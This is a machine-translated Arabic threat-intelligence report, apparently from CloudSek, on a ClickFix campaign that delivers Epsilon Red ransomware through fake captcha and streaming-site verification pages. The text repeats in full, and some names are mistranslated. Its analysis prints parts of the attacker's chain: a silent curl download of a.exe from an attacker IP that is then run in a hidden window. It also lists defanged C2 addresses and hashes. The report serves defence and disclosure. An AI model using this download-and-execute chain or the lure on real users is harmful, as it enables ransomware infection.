تجذب الجهات الفاعلة في مجال التهديد الضحايا إلى تنزيل ملفات.HTA باستخدام ClickFix لنشر برنامج Epsilon Red Ransomware
اكتشفت CloudSek حملة Epsilon Red جديدة لبرامج الفدية تستهدف المستخدمين على مستوى العالم عبر صفحات التحقق المزيفة من ClickFix. نشط منذ يوليو 2025، ويستخدم ممثلو التهديد الهندسة الاجتماعية وينتحلون منصات مثل Discord و Twitch و OnlyFans لخداع المستخدمين لتنفيذ ملفات.HTA الضارة من خلال ActiveX. يؤدي هذا إلى تنزيل الحمولة الصامتة ونشر برامج الفدية. يتم حث المستخدمين على تعطيل ActiveX وحظر عناوين IP للمهاجمين والتدريب على مواجهة مثل هذه الإغراءات.
أثناء البحث الروتيني عن البنية التحتية، كشفت TRIAD من CloudSek عن تحت عنوان كليكفيكس موقع تسليم البرامج الضارة قيد التطوير النشط، المرتبط بـ إبسيلون ريد رانسوم وير. على عكس الحملات السابقة التي تنسخ الأوامر إلى الحافظات، يحث هذا البديل الضحايا على زيارة صفحة ثانوية، حيث يتم تنفيذ أوامر shell الضارة بصمت عبر اكتيف إكس لتنزيل الحمولات وتشغيلها من عنوان IP يتحكم فيه المهاجم. تُستخدم أساليب الهندسة الاجتماعية، مثل رموز التحقق المزيفة، لتبدو حميدة. كشف التمحور حول البنية التحتية ذات الصلة عن انتحال شخصية خدمات مثل روبوت ديسكورد كابتشا، ركلة، نشل، و المعجبين فقط، بالإضافة إلى السحر ذي الطابع الرومانسي. تمت ملاحظة Epsilon Red لأول مرة في عام 2021 وهي مستوحاة بشكل فضفاض من ريفيل رانسومواري في تصميم مذكرة الفدية، ولكن بخلاف ذلك تبدو متميزة في تكتيكاتها وبنيتها التحتية.
التحليل
خلال نشاطنا الروتيني للبحث عن البنية التحتية، اكتشفنا صفحة تسليم البرامج الضارة تحت عنوان clickfix كانت قيد التطوير.
عادةً، عند النقر فوق زر التحقق، يتم نسخ الأمر الضار إلى حافظة الضحية. ومع ذلك، في هذه الحالة، تم حث الضحية على فتح صفحة أخرى على نفس الموقع.
cd /D %userprofile%: يقوم بالتبديل إلى الدليل الرئيسي للمستخدم.
curl -s -o a.exe...: يقوم بتنزيل ملف بصمت من عنوان IP وحفظه كملف a.exe.
a.exe: ينفذ الملف الذي تم تنزيله. [md5:98107c01ecd8b7802582d404e007e493] - أحمر إبسيلون
0: يقوم بتشغيل العملية مخفي (لا توجد نافذة معروضة).
يعرض رسالة تحقق مزيفة
Shell.run («تردد cmd /c رمز التحقق الخاص بك هو: pc-19fj5e9i-cje8i3e4 وإيقاف مؤقت»)؛
يعرض رسالة الهندسة الاجتماعية لاختتام موضوع clickfix bait.
قد يكون الخطأ المطبعي («التحقق») مقصودًا ليبدو غير مهدد أو هاوي.
وقفة: تبقي نافذة CMD مفتوحة.
عند إدخال الرمز الصحيح الموضح في موجه الأوامر، تظهر الرسالة التالية في مربع الحوار.
التمحور من خلال بنيتها التحتية، لاحظنا أن الجهات الفاعلة في مجال التهديد تنتحل شخصية روبوت كابتشا الشهير (https://captcha.bot)، جنبًا إلى جنب مع مجموعة متنوعة من خدمات البث مثل Kick و Twitch و Rumble و Onlyfans وغيرها التي تقدم في الغالب حمولات Windows باستخدام Clickfix. بالإضافة إلى ذلك، تمكنا من العثور على مجموعة صغيرة من صفحات تسليم clickfix ذات الطابع الرومانسي/المواعدة والتي يديرها نفس ممثل التهديد.
الإسناد
يترك برنامج Epsilon Red ransomware، الذي تم تحديده لأول مرة في عام 2021، مذكرة فدية على أجهزة الكمبيوتر المصابة التي تشبه مذكرة ReVil ransomware، وإن كان ذلك مع تحسينات نحوية طفيفة. علاوة على ذلك، لم يتم ملاحظة أي أوجه تشابه واضحة أخرى بين Epsilon Red و ReVil ransomware.
رسم خرائط MITRE
Tactic
Technique
ID
Description
Initial Access
Phishing: Drive-by Compromise
T1189
Victims are lured to themed websites (e.g., fake verification pages) where malicious scripts execute without user interaction.
Execution
Command and Scripting Interpreter: Windows Command Shell
T1059.003
Uses cmd.exe to execute downloaded binaries and display social engineering messages.
Execution
Command and Scripting Interpreter: JavaScript/VBScript
T1059.005
Malicious JavaScript (ActiveXObject("WScript.Shell")) embedded in web pages executes commands on the host.
Execution
User Execution: Malicious Link
T1204.001
Victims are socially engineered into clicking a malicious link and following staged instructions.
Defense Evasion
Obfuscated Files or Information
T1027
The payload is delivered with minimal visibility (curl -s) and executed silently (Run(..., 0)).
Defense Evasion
Masquerading
T1036
Use of fake verification codes and benign themes (e.g., captcha verification) to mislead users and security analysts.
Persistence (expected)
Scheduled Task/Job
T1053.005
Epsilon Red campaigns have historically used scheduled tasks for persistence post-execution.
Command and Control
Application Layer Protocol: Web Protocols
T1071.001
Uses HTTP (via curl) for payload download and possibly for follow-up C2 traffic.
Impact
Data Encrypted for Impact
T1486
Final-stage ransomware (Epsilon Red) encrypts victim files after initial infection.
IOC
Indicator Type
Value
Notes
md5
98107c01ecd8b7802582d404e007e493
Epsilon Red Ransomware
Domain
twtich[.]cc
Clickfix Delivery [.hta]
IP:Port
155.94.155[.]227:2269
Command and Control
md5
2db32339fa151276d5a40781bc8d5eaa
Quasar RAT Malware
Domain
capchabot[.]cc
Clickfix Delivery [regular]
IP:Port
213.209.150[.]188:8112
Command and Control
التأثير
تسوية نقطة النهاية عبر متصفحات الويب: يتيح إساءة استخدام ActiveXObject تنفيذ التعليمات البرمجية عن بُعد مباشرةً من جلسات المتصفح، متجاوزًا حماية التنزيل التقليدية.
نشر برامج الفدية: يمكن أن يؤدي ذلك إلى تشفير كامل لبرامج الفدية يسبقه حركة جانبية.
انتحال هوية العلامة التجارية يقلل من شكوك المستخدم: يؤدي محاكاة خدمات Discord captcha ومنصات البث إلى زيادة احتمالية نجاح الهندسة الاجتماعية.
إساءة استخدام البنية التحتية المستمرة: تشير إعادة استخدام صفحات التسليم ذات الموضوعات (Clickfix، ormance lures) عبر الحملات إلى البنية التحتية التشغيلية والتخطيط على المدى الطويل.
عوامل التخفيف
تعطيل برنامج ActiveX ومضيف البرنامج النصي لنظام التشغيل Windows (WSH): فرض سياسات المجموعة لحظر متجهات تنفيذ البرامج النصية القديمة (WScript.shell، ActiveXObject) في جميع البيئات.
تكامل تغذية التهديدات وحظر IP: استوعب معلومات التهديد بشكل استباقي لإدراج عناوين IP والنطاقات المعروفة للمهاجمين في القائمة السوداء، بالإضافة إلى IOFAs (مؤشرات الهجوم المستقبلي) المرتبطة بحملات Clickfix.
تحليلات سلوك نقطة النهاية: نشر قواعد EDR للإبلاغ عن عمليات التنفيذ المخفية (Shell.run و cmd /c والتنزيلات الصامتة عبر curl) وإنشاء العمليات الفرعية المشبوهة من المتصفحات.
تدريب التوعية الأمنية: محاكاة الهجمات التي تنتحل صفة الخدمات المألوفة (مثل روبوتات Discord و Twitch) لتكييف المستخدمين ضد التفاعل مع صفحات التحقق المزيفة.
تجذب الجهات الفاعلة في مجال التهديد الضحايا إلى تنزيل ملفات.HTA باستخدام ClickFix لنشر برنامج Epsilon Red Ransomware
اكتشفت CloudSek حملة Epsilon Red جديدة لبرامج الفدية تستهدف المستخدمين على مستوى العالم عبر صفحات التحقق المزيفة من ClickFix. نشط منذ يوليو 2025، ويستخدم ممثلو التهديد الهندسة الاجتماعية وينتحلون منصات مثل Discord و Twitch و OnlyFans لخداع المستخدمين لتنفيذ ملفات.HTA الضارة من خلال ActiveX. يؤدي هذا إلى تنزيل الحمولة الصامتة ونشر برامج الفدية. يتم حث المستخدمين على تعطيل ActiveX وحظر عناوين IP للمهاجمين والتدريب على مواجهة مثل هذه الإغراءات.
Get the latest industry news, threats and resources.
ملخص تنفيذي
أثناء البحث الروتيني عن البنية التحتية، كشفت TRIAD من CloudSek عن تحت عنوان كليكفيكس موقع تسليم البرامج الضارة قيد التطوير النشط، المرتبط بـ إبسيلون ريد رانسوم وير. على عكس الحملات السابقة التي تنسخ الأوامر إلى الحافظات، يحث هذا البديل الضحايا على زيارة صفحة ثانوية، حيث يتم تنفيذ أوامر shell الضارة بصمت عبر اكتيف إكس لتنزيل الحمولات وتشغيلها من عنوان IP يتحكم فيه المهاجم. تُستخدم أساليب الهندسة الاجتماعية، مثل رموز التحقق المزيفة، لتبدو حميدة. كشف التمحور حول البنية التحتية ذات الصلة عن انتحال شخصية خدمات مثل روبوت ديسكورد كابتشا، ركلة، نشل، و المعجبين فقط، بالإضافة إلى السحر ذي الطابع الرومانسي. تمت ملاحظة Epsilon Red لأول مرة في عام 2021 وهي مستوحاة بشكل فضفاض من ريفيل رانسومواري في تصميم مذكرة الفدية، ولكن بخلاف ذلك تبدو متميزة في تكتيكاتها وبنيتها التحتية.
التحليل
خلال نشاطنا الروتيني للبحث عن البنية التحتية، اكتشفنا صفحة تسليم البرامج الضارة تحت عنوان clickfix كانت قيد التطوير.
عادةً، عند النقر فوق زر التحقق، يتم نسخ الأمر الضار إلى حافظة الضحية. ومع ذلك، في هذه الحالة، تم حث الضحية على فتح صفحة أخرى على نفس الموقع.
cd /D %userprofile%: يقوم بالتبديل إلى الدليل الرئيسي للمستخدم.
curl -s -o a.exe...: يقوم بتنزيل ملف بصمت من عنوان IP وحفظه كملف a.exe.
a.exe: ينفذ الملف الذي تم تنزيله. [md5:98107c01ecd8b7802582d404e007e493] - أحمر إبسيلون
0: يقوم بتشغيل العملية مخفي (لا توجد نافذة معروضة).
يعرض رسالة تحقق مزيفة
Shell.run («تردد cmd /c رمز التحقق الخاص بك هو: pc-19fj5e9i-cje8i3e4 وإيقاف مؤقت»)؛
يعرض رسالة الهندسة الاجتماعية لاختتام موضوع clickfix bait.
قد يكون الخطأ المطبعي («التحقق») مقصودًا ليبدو غير مهدد أو هاوي.
وقفة: تبقي نافذة CMD مفتوحة.
عند إدخال الرمز الصحيح الموضح في موجه الأوامر، تظهر الرسالة التالية في مربع الحوار.
التمحور من خلال بنيتها التحتية، لاحظنا أن الجهات الفاعلة في مجال التهديد تنتحل شخصية روبوت كابتشا الشهير (https://captcha.bot)، جنبًا إلى جنب مع مجموعة متنوعة من خدمات البث مثل Kick و Twitch و Rumble و Onlyfans وغيرها التي تقدم في الغالب حمولات Windows باستخدام Clickfix. بالإضافة إلى ذلك، تمكنا من العثور على مجموعة صغيرة من صفحات تسليم clickfix ذات الطابع الرومانسي/المواعدة والتي يديرها نفس ممثل التهديد.
الإسناد
يترك برنامج Epsilon Red ransomware، الذي تم تحديده لأول مرة في عام 2021، مذكرة فدية على أجهزة الكمبيوتر المصابة التي تشبه مذكرة ReVil ransomware، وإن كان ذلك مع تحسينات نحوية طفيفة. علاوة على ذلك، لم يتم ملاحظة أي أوجه تشابه واضحة أخرى بين Epsilon Red و ReVil ransomware.
رسم خرائط MITRE
Tactic
Technique
ID
Description
Initial Access
Phishing: Drive-by Compromise
T1189
Victims are lured to themed websites (e.g., fake verification pages) where malicious scripts execute without user interaction.
Execution
Command and Scripting Interpreter: Windows Command Shell
T1059.003
Uses cmd.exe to execute downloaded binaries and display social engineering messages.
Execution
Command and Scripting Interpreter: JavaScript/VBScript
T1059.005
Malicious JavaScript (ActiveXObject("WScript.Shell")) embedded in web pages executes commands on the host.
Execution
User Execution: Malicious Link
T1204.001
Victims are socially engineered into clicking a malicious link and following staged instructions.
Defense Evasion
Obfuscated Files or Information
T1027
The payload is delivered with minimal visibility (curl -s) and executed silently (Run(..., 0)).
Defense Evasion
Masquerading
T1036
Use of fake verification codes and benign themes (e.g., captcha verification) to mislead users and security analysts.
Persistence (expected)
Scheduled Task/Job
T1053.005
Epsilon Red campaigns have historically used scheduled tasks for persistence post-execution.
Command and Control
Application Layer Protocol: Web Protocols
T1071.001
Uses HTTP (via curl) for payload download and possibly for follow-up C2 traffic.
Impact
Data Encrypted for Impact
T1486
Final-stage ransomware (Epsilon Red) encrypts victim files after initial infection.
IOC
Indicator Type
Value
Notes
md5
98107c01ecd8b7802582d404e007e493
Epsilon Red Ransomware
Domain
twtich[.]cc
Clickfix Delivery [.hta]
IP:Port
155.94.155[.]227:2269
Command and Control
md5
2db32339fa151276d5a40781bc8d5eaa
Quasar RAT Malware
Domain
capchabot[.]cc
Clickfix Delivery [regular]
IP:Port
213.209.150[.]188:8112
Command and Control
التأثير
تسوية نقطة النهاية عبر متصفحات الويب: يتيح إساءة استخدام ActiveXObject تنفيذ التعليمات البرمجية عن بُعد مباشرةً من جلسات المتصفح، متجاوزًا حماية التنزيل التقليدية.
نشر برامج الفدية: يمكن أن يؤدي ذلك إلى تشفير كامل لبرامج الفدية يسبقه حركة جانبية.
انتحال هوية العلامة التجارية يقلل من شكوك المستخدم: يؤدي محاكاة خدمات Discord captcha ومنصات البث إلى زيادة احتمالية نجاح الهندسة الاجتماعية.
إساءة استخدام البنية التحتية المستمرة: تشير إعادة استخدام صفحات التسليم ذات الموضوعات (Clickfix، ormance lures) عبر الحملات إلى البنية التحتية التشغيلية والتخطيط على المدى الطويل.
عوامل التخفيف
تعطيل برنامج ActiveX ومضيف البرنامج النصي لنظام التشغيل Windows (WSH): فرض سياسات المجموعة لحظر متجهات تنفيذ البرامج النصية القديمة (WScript.shell، ActiveXObject) في جميع البيئات.
تكامل تغذية التهديدات وحظر IP: استوعب معلومات التهديد بشكل استباقي لإدراج عناوين IP والنطاقات المعروفة للمهاجمين في القائمة السوداء، بالإضافة إلى IOFAs (مؤشرات الهجوم المستقبلي) المرتبطة بحملات Clickfix.
تحليلات سلوك نقطة النهاية: نشر قواعد EDR للإبلاغ عن عمليات التنفيذ المخفية (Shell.run و cmd /c والتنزيلات الصامتة عبر curl) وإنشاء العمليات الفرعية المشبوهة من المتصفحات.
تدريب التوعية الأمنية: محاكاة الهجمات التي تنتحل صفة الخدمات المألوفة (مثل روبوتات Discord و Twitch) لتكييف المستخدمين ضد التفاعل مع صفحات التحقق المزيفة.